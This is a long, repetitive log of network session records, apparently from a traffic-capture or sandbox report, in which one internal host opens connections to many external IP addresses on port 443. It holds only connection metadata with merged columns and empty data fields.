                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19249192.168.2.2357808111.196.255.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19250192.168.2.23411464.2.127.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19251192.168.2.2336910171.67.71.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19252192.168.2.2339480148.124.152.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19253192.168.2.2348040139.7.144.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19254192.168.2.2349672166.195.231.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19255192.168.2.2338048119.79.144.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19256192.168.2.2358832143.244.176.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19257192.168.2.2355542212.38.198.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19258192.168.2.2338558102.221.0.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19259192.168.2.23541424.194.120.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19260192.168.2.2356410140.218.186.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19261192.168.2.2346304146.249.229.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19262192.168.2.233321884.126.85.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19263192.168.2.2335658101.185.241.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19264192.168.2.2337488101.185.146.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19265192.168.2.2356306149.253.102.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19266192.168.2.2341718167.220.5.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19267192.168.2.233544045.175.206.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19268192.168.2.2345680106.55.112.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19269192.168.2.2336844212.121.155.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19270192.168.2.235499017.111.79.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19271192.168.2.2350840140.218.142.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19272192.168.2.235963834.210.121.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19273192.168.2.235609093.131.72.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19274192.168.2.235789844.58.76.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19275192.168.2.2341242178.101.81.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19276192.168.2.2336460153.52.4.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19277192.168.2.235753493.4.168.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19278192.168.2.235580031.252.22.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19279192.168.2.234078246.220.55.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19280192.168.2.235222242.179.222.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19281192.168.2.2335078204.212.40.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19282192.168.2.235395447.54.13.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19283192.168.2.233779223.138.2.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19284192.168.2.235044819.237.22.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19285192.168.2.233372852.78.114.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19286192.168.2.234011070.254.99.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19287192.168.2.2356696152.176.223.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19288192.168.2.2338896199.215.249.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19289192.168.2.233480246.141.215.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19290192.168.2.23461648.87.184.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19291192.168.2.234403498.197.219.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19292192.168.2.234328676.207.188.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19293192.168.2.233857232.224.82.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19294192.168.2.2343032157.176.189.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19295192.168.2.2334228181.6.219.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19296192.168.2.234493025.212.106.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19297192.168.2.2360290104.80.174.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19298192.168.2.2358578169.53.128.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19299192.168.2.233553688.115.177.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19300192.168.2.2352022211.130.247.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19301192.168.2.2345756147.114.232.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19302192.168.2.2350670172.146.90.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19303192.168.2.2353614196.108.162.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19304192.168.2.2338182133.117.251.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19305192.168.2.2333090217.62.60.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19306192.168.2.2346568116.126.93.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19307192.168.2.2336308108.175.73.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19308192.168.2.233518253.197.16.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19309192.168.2.233926874.85.228.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19310192.168.2.2344360103.110.226.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19311192.168.2.2349972191.6.174.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19312192.168.2.234552820.47.138.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19313192.168.2.2350432153.44.136.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19314192.168.2.2350836111.246.48.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19315192.168.2.2341304139.251.188.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19316192.168.2.2352496138.12.171.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19317192.168.2.2334946161.46.171.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19318192.168.2.233463812.170.24.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19319192.168.2.2354494133.250.70.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19320192.168.2.2336258201.9.132.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19321192.168.2.236072261.58.214.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19322192.168.2.235431242.146.145.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19323192.168.2.2354468216.238.135.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19324192.168.2.233534247.207.179.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19325192.168.2.2338768102.60.16.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19326192.168.2.235054247.99.43.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19327192.168.2.234244670.4.226.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19328192.168.2.2335984194.214.202.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19329192.168.2.234309845.60.104.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19330192.168.2.2346082195.203.206.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19331192.168.2.2356822146.174.121.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19332192.168.2.2337520120.82.91.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19333192.168.2.2359894152.23.130.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19334192.168.2.2343102161.223.197.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19335192.168.2.2349692179.25.96.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19336192.168.2.234725470.179.208.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19337192.168.2.235874812.71.212.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19338192.168.2.2351198130.167.33.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19339192.168.2.2334462216.69.130.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19340192.168.2.2354950154.74.153.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19341192.168.2.2360082202.172.229.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19342192.168.2.2333668117.87.185.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19343192.168.2.2358658148.105.0.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19344192.168.2.2348630119.133.136.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19345192.168.2.2335978195.212.25.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19346192.168.2.235456840.13.167.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19347192.168.2.2334056207.85.173.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19348192.168.2.234277823.164.250.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19349192.168.2.2348926118.108.73.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19350192.168.2.2347808129.43.10.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19351192.168.2.2348254133.21.247.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19352192.168.2.235226066.39.182.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19353192.168.2.235070095.231.244.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19354192.168.2.2357490201.170.4.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19355192.168.2.2336272201.153.204.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19356192.168.2.235083835.223.57.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19357192.168.2.233922681.40.131.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19358192.168.2.2360946135.206.12.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19359192.168.2.2339408186.82.210.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19360192.168.2.2351776128.85.80.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19361192.168.2.2344618107.248.53.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19362192.168.2.2353560117.244.12.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19363192.168.2.235274845.96.189.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19364192.168.2.2343324110.26.207.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19365192.168.2.2337788128.230.140.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19366192.168.2.2349522160.208.158.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19367192.168.2.2352702223.22.254.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19368192.168.2.2338174200.224.195.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19369192.168.2.234514442.120.175.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19370192.168.2.2356458181.244.175.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19371192.168.2.2350886114.199.69.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19372192.168.2.2358194207.244.60.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19373192.168.2.2338590163.191.225.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19374192.168.2.2355262151.9.44.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19375192.168.2.235397062.108.224.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19376192.168.2.233295657.94.136.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19377192.168.2.2345320142.75.155.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19378192.168.2.2359020147.47.69.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19379192.168.2.2337684146.201.247.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19380192.168.2.23480161.191.25.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19381192.168.2.233760432.91.170.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19382192.168.2.2342718170.228.16.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19383192.168.2.235288631.194.24.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19384192.168.2.235445837.151.71.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19385192.168.2.235485212.220.177.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19386192.168.2.2354102148.219.209.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19387192.168.2.2350062103.109.39.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19388192.168.2.2346376185.50.138.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19389192.168.2.236045081.0.71.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19390192.168.2.235173017.106.193.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19391192.168.2.2356518129.34.49.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19392192.168.2.2355852131.93.25.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19393192.168.2.2352816109.30.162.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19394192.168.2.233387699.33.62.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19395192.168.2.235930031.150.187.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19396192.168.2.2347190137.47.109.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19397192.168.2.2356826132.5.241.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19398192.168.2.2344764202.164.37.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19399192.168.2.2349796217.46.200.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19400192.168.2.2357236198.186.168.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19401192.168.2.2358412196.30.24.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19402192.168.2.2352790143.40.9.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19403192.168.2.234265070.11.57.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19404192.168.2.2345618107.73.114.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19405192.168.2.2345830153.7.76.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19406192.168.2.2340780103.3.235.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19407192.168.2.235681864.209.80.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19408192.168.2.2333440110.68.211.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19409192.168.2.2354672185.76.165.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19410192.168.2.2357928114.37.214.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19411192.168.2.2359926158.175.192.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19412192.168.2.2356910153.166.39.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19413192.168.2.233331237.6.137.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19414192.168.2.2341720159.248.247.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19415192.168.2.2357130200.157.140.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19416192.168.2.2351242222.217.68.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19417192.168.2.2344158169.118.114.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19418192.168.2.235648296.91.193.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19419192.168.2.23416044.131.198.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19420192.168.2.235337613.146.195.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19421192.168.2.233367060.164.96.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19422192.168.2.2344626176.47.71.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19423192.168.2.2356142141.147.205.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19424192.168.2.235322250.39.95.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19425192.168.2.234831086.18.218.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19426192.168.2.233603861.181.39.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19427192.168.2.2355924169.251.137.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19428192.168.2.2345080172.114.182.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19429192.168.2.2350658179.191.146.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19430192.168.2.2352796107.72.58.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19431192.168.2.234483641.79.130.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19432192.168.2.2343982166.217.221.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19433192.168.2.2344088160.35.56.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19434192.168.2.2358978187.244.218.66443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19435192.168.2.2358038222.104.79.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19436192.168.2.235475665.188.211.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19437192.168.2.2337402114.100.24.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19438192.168.2.2358250122.180.154.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19439192.168.2.235478812.215.130.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19440192.168.2.2337104142.227.126.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19441192.168.2.234291081.42.22.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19442192.168.2.2336384178.170.156.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19443192.168.2.2337918140.74.71.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19444192.168.2.2353462130.211.6.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19445192.168.2.234836051.76.203.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19446192.168.2.235417235.59.247.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19447192.168.2.234420825.49.245.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19448192.168.2.2354442165.53.47.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19449192.168.2.235081097.40.72.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19450192.168.2.234763249.109.153.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19451192.168.2.234902670.100.189.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19452192.168.2.235499867.206.207.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19453192.168.2.2350106203.83.142.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19454192.168.2.236066434.84.152.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19455192.168.2.235194251.213.83.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19456192.168.2.2339656161.249.49.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19457192.168.2.235829658.36.24.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19458192.168.2.2345726199.14.230.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19459192.168.2.2338854222.167.158.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19460192.168.2.23562861.75.148.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19461192.168.2.235482042.144.35.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19462192.168.2.2338666144.109.161.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19463192.168.2.2344464184.169.110.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19464192.168.2.2336984177.112.161.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19465192.168.2.235051299.50.238.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19466192.168.2.234331841.61.212.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19467192.168.2.234756239.181.223.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19468192.168.2.236058078.48.203.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19469192.168.2.2355582170.116.151.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19470192.168.2.2340782122.21.93.223443
